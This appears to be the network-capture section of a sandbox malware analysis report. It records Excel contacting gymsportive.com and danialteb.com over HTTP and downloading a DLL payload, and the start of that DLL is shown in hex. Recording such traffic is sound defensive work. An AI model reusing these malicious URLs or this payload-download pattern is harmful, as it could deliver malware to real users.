Mar 4, 2022 15:23:45.571419954 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571427107 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571459055 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571469069 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571487904 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571496964 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571507931 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571536064 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571542025 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571573973 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571579933 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571611881 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571619987 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571651936 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571656942 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571691036 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571696997 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571727037 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571738958 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571743011 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571764946 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571773052 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571803093 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571810961 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571840048 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571847916 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571877956 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571883917 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571914911 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571923018 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571953058 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.571959019 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571988106 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.571991920 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572006941 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572027922 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572036982 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572067022 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572073936 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572104931 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572110891 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572143078 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572150946 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572180986 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572186947 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572218895 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572225094 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572257996 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572266102 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572269917 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572298050 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572303057 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572334051 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572341919 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572371960 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572379112 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572410107 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572417974 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572447062 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572454929 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572484970 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572490931 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572525024 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572530985 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572562933 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572571039 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572602034 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572609901 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572638988 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572647095 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572678089 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572685003 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572715044 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572721958 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572751999 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572760105 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572788954 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572797060 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572827101 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572834015 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572865963 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572871923 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572905064 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572910070 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572942019 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572948933 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.572978973 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.572987080 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573018074 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573024988 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573054075 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573062897 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573091984 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573097944 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573128939 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573136091 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573167086 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573172092 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573206902 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573211908 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573242903 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573251009 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573281050 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573286057 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573318005 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573323965 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573354006 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573363066 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573391914 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573399067 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573430061 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573436975 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573467970 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573474884 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573507071 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573513985 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573545933 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573550940 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573584080 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573589087 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573621988 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573628902 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573658943 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573667049 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573695898 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573703051 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573733091 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573740959 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573771954 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573786974 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573811054 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573817968 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573847055 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573854923 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573884964 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573892117 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573923111 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573930025 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573960066 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.573972940 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.573997021 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.574004889 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.574035883 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.574040890 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.574080944 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.890374899 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.890552044 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.991374969 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.991439104 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.991478920 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.991518021 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.991556883 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.991564035 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.991599083 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.991605997 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.991611958 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.991616964 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.991621971 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.991674900 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:56.881350040 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:56.881454945 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:24:05.448884964 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:05.665668964 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:05.665921926 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:05.760483027 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:05.977273941 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:05.990631104 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:05.990685940 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:05.990823984 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:05.990955114 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:06.008779049 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:06.227893114 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:06.228141069 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:08.900671005 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:09.162779093 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:12.039079905 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:12.039326906 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:24:15.036221027 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:15.036267042 CET	80	49167	186.250.48.5	192.168.2.22
Mar 4, 2022 15:24:15.036529064 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:25:44.374530077 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:25:44.684382915 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:25:45.292783976 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:25:46.494020939 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:25:48.990226030 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:25:53.795406103 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:25:55.262900114 CET	49167	80	192.168.2.22	186.250.48.5
Mar 4, 2022 15:25:55.262960911 CET	49167	80	192.168.2.22	186.250.48.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 4, 2022 15:23:44.499696970 CET	52167	53	192.168.2.22	8.8.8.8
Mar 4, 2022 15:23:44.575113058 CET	53	52167	8.8.8.8	192.168.2.22
Mar 4, 2022 15:23:44.728199959 CET	50591	53	192.168.2.22	8.8.8.8
Mar 4, 2022 15:23:44.748084068 CET	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 4, 2022 15:23:44.499696970 CET	192.168.2.22	8.8.8.8	0x1fb4	Standard query (0)	gymsportive.com	A (IP address)	IN (0x0001)
Mar 4, 2022 15:23:44.728199959 CET	192.168.2.22	8.8.8.8	0xc4c2	Standard query (0)	danialteb.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 4, 2022 15:23:44.575113058 CET	8.8.8.8	192.168.2.22	0x1fb4	No error (0)	gymsportive.com		212.64.200.154	A (IP address)	IN (0x0001)
Mar 4, 2022 15:23:44.748084068 CET	8.8.8.8	192.168.2.22	0xc4c2	No error (0)	danialteb.com		194.5.188.24	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gymsportive.com

danialteb.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	212.64.200.154	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 4, 2022 15:23:44.646928072 CET	2	OUT	GET /0zwe/pSiUh/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gymsportive.com Connection: Keep-Alive
Mar 4, 2022 15:23:44.710865974 CET	3	IN	HTTP/1.1 503 Service Temporarily Unavailable Cache-Control: private Content-Type: text/html; charset=utf-8 Server: X-Powered-By-Plesk: PleskWin Date: Fri, 04 Mar 2022 14:23:44 GMT Content-Length: 4698 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 35 30 33 2e 30 20 2d 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 503.0 - Service Temporarily Unavailable</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;ma
Mar 4, 2022 15:23:44.710941076 CET	5	IN	Data Raw: 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 Data Ascii: rgin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-conta
Mar 4, 2022 15:23:44.710983992 CET	6	IN	Data Raw: 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 20 3c 68 33 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 30 20 2d 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 Data Ascii: class="content-container"> <h3>HTTP Error 503.0 - Service Temporarily Unavailable</h3> <h4>503 Service Temporarily Unavailable</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <li>An invali
Mar 4, 2022 15:23:44.711025000 CET	7	IN	Data Raw: 3c 74 68 3e 52 65 71 75 65 73 74 65 64 20 55 52 4c 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 68 74 74 70 3a 2f 2f 67 79 6d 73 70 6f 72 74 69 76 65 2e 63 6f 6d 3a 38 30 2f 30 7a 77 65 2f 70 53 69 55 68 2f 3c Data Ascii: <th>Requested URL</th><td>   http://gymsportive.com:80/0zwe/pSiUh/</td></tr> <tr><th>Physical Path</th><td>   D:\Web\gymsportive.com\httpdocs\0zwe\pSiUh\</td></tr> <tr class="alt"><th>Logon Method</th><t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	194.5.188.24	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 4, 2022 15:23:44.851373911 CET	8	OUT	GET /wp-admin/NqRYgwPERRPoTs/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: danialteb.com Connection: Keep-Alive
Mar 4, 2022 15:23:44.961889029 CET	10	IN	HTTP/1.1 200 OK Connection: Keep-Alive X-Powered-By: PHP/7.3.13 Set-Cookie: 622220f0dde1d=1646403824; expires=Fri, 04-Mar-2022 14:24:44 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Fri, 04 Mar 2022 14:23:44 GMT Expires: Fri, 04 Mar 2022 14:23:44 GMT Content-Type: application/x-msdownload Content-Disposition: attachment; filename="ouyGhPOm.dll" Content-Transfer-Encoding: binary Content-Length: 626176 Date: Fri, 04 Mar 2022 14:23:44 GMT Server: LiteSpeed Vary: User-Agent Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cb cf 2f 5a 8f ae 41 09 8f ae 41 09 8f ae 41 09 a8 68 2c 09 85 ae 41 09 a8 68 3a 09 98 ae 41 09 8f ae 40 09 ac ac 41 09 91 fc d4 09 ab ae 41 09 91 fc c2 09 1e ae 41 09 91 fc c5 09 2c ae 41 09 91 fc d3 09 8e ae 41 09 91 fc d5 09 8e ae 41 09 8f ae d6 09 8e ae 41 09 91 fc d0 09 8e ae 41 09 52 69 63 68 8f ae 41 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 